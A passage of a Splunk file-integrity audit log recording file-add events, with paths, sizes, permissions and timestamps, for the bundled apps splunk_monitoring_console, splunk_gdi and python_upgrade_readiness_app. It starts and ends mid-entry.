17:41:53.741, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default/.eslintignore", isdir=0, size=42, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.436, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/metadata/default.meta", isdir=0, size=62, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.431, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/README/splunk_monitoring_console_assets.conf.spec", isdir=0, size=3566, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.427, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/README/savedsearches.conf.spec", isdir=0, size=680, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.423, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/README/dmc_alerts.conf.spec", isdir=0, size=5391, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.319, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/bin/dmc_config.py", isdir=0, size=1639, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r-xr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.315, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/static/appIcon_2x.png", isdir=0, size=2621, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.310, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/static/appIconAlt_2x.png", isdir=0, size=3610, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.304, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/static/appIconAlt.png", isdir=0, size=1489, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.299, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/static/appIcon.png", isdir=0, size=1071, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.295, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/lookups/assets.csv", isdir=0, size=327, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:06 2022", mode="rw-------", hash=] Audit:[timestamp=10-06-2022 17:41:53.291, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/profiles/test.config.js", isdir=0, size=1172, gid=41812, uid=41812, modtime="Sat May 1 18:22:54 2021", mode="r--r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.286, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.283, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/src", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.278, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/profiles", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.274, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.270, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/lookups", isdir=1, size=4096, gid=41812, uid=41812, modtime="Thu Oct 6 17:32:06 2022", mode="rwx------", hash=] Audit:[timestamp=10-06-2022 17:41:53.265, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.261, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/build_tools", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.257, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/bin", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.251, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:16 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.245, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_monitoring_console/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:45:21 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:53.140, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/templates/home_template.html", isdir=0, size=1257, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.136, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/images/default-icon.png", isdir=0, size=3832, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.133, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/images/blank-deployment.png", isdir=0, size=3649, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.128, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/build/home.pcss.lite.style.css", isdir=0, size=3720, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:36 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.124, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/build/home.pcss.lite.css", isdir=0, size=393516, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:36 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.120, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/build/home.pcss.enterprise.style.css", isdir=0, size=3720, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.116, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/build/home.pcss.enterprise.css", isdir=0, size=393437, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:30 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.112, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/build/home.lite.jsx.js", isdir=0, size=3361705, gid=41812, uid=41812, modtime="Tue Mar 2 08:49:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.109, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/build/home.enterprise.jsx.js", isdir=0, size=4778140, gid=41812, uid=41812, modtime="Tue Mar 2 08:49:10 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:53.004, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/images", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.999, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static/build", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:49:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.995, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/templates", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.990, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:49:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.986, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/default/server.conf", isdir=0, size=60, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.982, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/default/gdi_settings.conf", isdir=0, size=81, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.978, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/default/app.conf", isdir=0, size=263, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.873, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/metadata/default.meta", isdir=0, size=43, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.867, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/README/gdi_settings.conf.spec", isdir=0, size=143, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.863, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/zh_CN/LC_MESSAGES/messages.po", isdir=0, size=10073, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.859, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/zh_CN/LC_MESSAGES/messages.mo", isdir=0, size=4964, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.854, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/zh_CN/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.849, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/ja_JP/LC_MESSAGES/messages.po", isdir=0, size=11066, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.845, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/ja_JP/LC_MESSAGES/messages.mo", isdir=0, size=5939, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.840, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/ja_JP/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.836, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/fr_FR/LC_MESSAGES/messages.po", isdir=0, size=10902, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.832, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/fr_FR/LC_MESSAGES/messages.mo", isdir=0, size=5832, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.827, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/fr_FR/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.723, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/ko_KR/LC_MESSAGES/messages.po", isdir=0, size=10736, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.719, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/ko_KR/LC_MESSAGES/messages.mo", isdir=0, size=5612, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.715, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/ko_KR/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.711, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/de_DE/LC_MESSAGES/messages.po", isdir=0, size=10749, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.707, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/de_DE/LC_MESSAGES/messages.mo", isdir=0, size=5682, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.703, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/de_DE/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.699, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/zh_TW/LC_MESSAGES/messages.po", isdir=0, size=10112, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.695, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/zh_TW/LC_MESSAGES/messages.mo", isdir=0, size=5006, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.690, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/zh_TW/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.686, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/it_IT/LC_MESSAGES/messages.po", isdir=0, size=10658, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.682, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/it_IT/LC_MESSAGES/messages.mo", isdir=0, size=5591, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.578, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/it_IT/LC_MESSAGES", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.574, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/zh_TW", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.569, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/zh_CN", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.566, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/messages.pot", isdir=0, size=8643, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:40 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.562, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/ko_KR", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.558, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/ja_JP", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.554, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/it_IT", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.550, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/fr_FR", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.546, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale/de_DE", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.542, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/metadata", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.538, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/locale", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.535, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/license-eula.txt", isdir=0, size=66575, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:42 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.531, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/license-eula.rtf", isdir=0, size=731435, gid=41812, uid=41812, modtime="Tue Mar 2 08:45:42 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.526, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/default", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.522, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/appserver", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.517, user=n/a, action=add,path="/opt/splunk/etc/apps/splunk_gdi/README", isdir=1, size=4096, gid=41812, uid=41812, modtime="Tue Mar 2 08:48:25 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.412, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/appserver/templates/instance_scan.html", isdir=0, size=869, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.406, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/appserver/static/pages/textme.txt", isdir=0, size=18, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.402, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/appserver/static/pages/instance_scan.js", isdir=0, size=7565216, gid=41812, uid=41812, modtime="Sat Mar 27 08:59:22 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.399, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/appserver/static/pages", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.395, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/appserver/templates", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.389, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/appserver/static", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.385, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/appserver/README.md", isdir=0, size=0, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.280, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/data/ui/nav/default.xml", isdir=0, size=61, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.276, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/data/ui/views/instance_scan.xml", isdir=0, size=150, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.271, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/data/ui/views", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.267, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/data/ui/nav", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.262, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/data/ui", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.258, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/web.conf", isdir=0, size=635, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.254, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/restmap.conf", isdir=0, size=3837, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.250, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/inputs.conf", isdir=0, size=553, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.245, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/data", isdir=1, size=4096, gid=41812, uid=41812, modtime="Sat May 1 18:46:07 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.241, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/collections.conf", isdir=0, size=736, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.238, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/default/app.conf", isdir=0, size=313, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.134, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/metadata/default.meta", isdir=0, size=403, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:35 2021", mode="rw-r--r--", hash=] Audit:[timestamp=10-06-2022 17:41:52.130, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_unpacking.py", isdir=0, size=5946, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.127, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_throw.py", isdir=0, size=835, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.123, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_raise_.py", isdir=0, size=1225, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.119, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_raise.py", isdir=0, size=1099, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.116, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_printfunction.py", isdir=0, size=401, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.111, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_next.py", isdir=0, size=1233, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.107, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_newstyle.py", isdir=0, size=888, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.102, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_metaclass.py", isdir=0, size=3260, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.098, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_memoryview.py", isdir=0, size=551, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.089, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_kwargs.py", isdir=0, size=5991, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.085, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_imports2.py", isdir=0, size=8580, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.082, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_imports.py", isdir=0, size=4944, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.078, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_getcwd.py", isdir=0, size=873, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.074, user=n/a, action=add,path="/opt/splunk/etc/apps/python_upgrade_readiness_app/bin/libs_py3/pura_libs_utils/libpasteurize/fixes/fix_future_builtins.py", isdir=0, size=1450, gid=41812, uid=41812, modtime="Sat Mar 27 08:58:34 2021", mode="rwxr-xr-x", hash=] Audit:[timestamp=10-06-2022 17:41:52.071, user=n/a, 